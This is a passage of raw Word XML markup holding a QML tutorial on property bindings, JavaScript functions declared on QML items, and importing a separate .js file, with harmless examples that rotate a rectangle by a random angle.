        <w:t>2</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5D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="005D6639">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Note </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE043C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>that function calls, like Math.random(), will not be revaluated unless their arguments change</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. So binding to Math.random() will be one random number and not </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>revaluated, but if the width is changed in some other manner, the height binding will be reevaluated to take that into account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="00DE043C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc483000561"/>
      <w:bookmarkStart w:id="154" w:name="_Toc483003582"/>
      <w:bookmarkStart w:id="155" w:name="_Toc483603917"/>
      <w:bookmarkStart w:id="156" w:name="_Toc483605137"/>
      <w:r w:rsidRPr="00214B49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adding JavaScript Functions in QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:bookmarkEnd w:id="154"/>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="005D6639">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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JavaScript functions can be declared on QML items, like in the below example. This allows you </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to call the method using the item id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.3</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Item</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id: container</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320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480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randomNumber()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return</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Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.random() * </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</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getNumber()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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> container.randomNumber();</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MouseArea</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anchors.fill: parent</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 This line uses the JS function from the item</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onClicked: rectangle.rotation = container.getNumber();</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Rectangle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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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Rectangle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id: rectangle</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anchors.centerIn: parent</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160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160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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"green"</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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> on rotation { </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RotationAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> { direction: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RotationAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Clockwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> } }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00214B49" w:rsidRDefault="005D6639" w:rsidP="00214B4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214B49">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="using-javascript-files"/>
      <w:bookmarkStart w:id="158" w:name="_Toc483000565"/>
      <w:bookmarkStart w:id="159" w:name="_Toc483003586"/>
      <w:bookmarkStart w:id="160" w:name="_Toc483603918"/>
      <w:bookmarkStart w:id="161" w:name="_Toc483605138"/>
      <w:bookmarkEnd w:id="157"/>
      <w:r w:rsidRPr="00214B49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using JavaScript Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w:rsidR="00BD0039" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639"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 xml:space="preserve">JavaScript files can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for abstracting out logic from QML files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. To do this, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> place your functions </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51AB7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inside a .js file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> like in the example shown.</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// myscript.js</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> getRandom(previousValue)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FF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</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Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.floor(previousValue + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">.random() * </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) % </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</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5D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="005D6639">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Then import</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file into any .qml file that needs to use the functions, like the example QML file below.</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55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>import</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QtQuick</w:t>
      </w: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FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00906D8E"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262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906D8E">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>import "myscript.js" as Logic</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4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Item</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320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480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Rectangle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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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MouseArea</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anchors.fill: parent</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// This line uses the JS function from the separate JS file</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onClicked: rectangle.rotation = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.getRandom(rectangle.rotation);</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Rectangle</w:t>
      </w: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id: rectangle</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anchors.centerIn: parent</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width: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>160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height: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>160</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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"green"</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r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> on rotation { </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RotationAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> { direction: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RotationAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
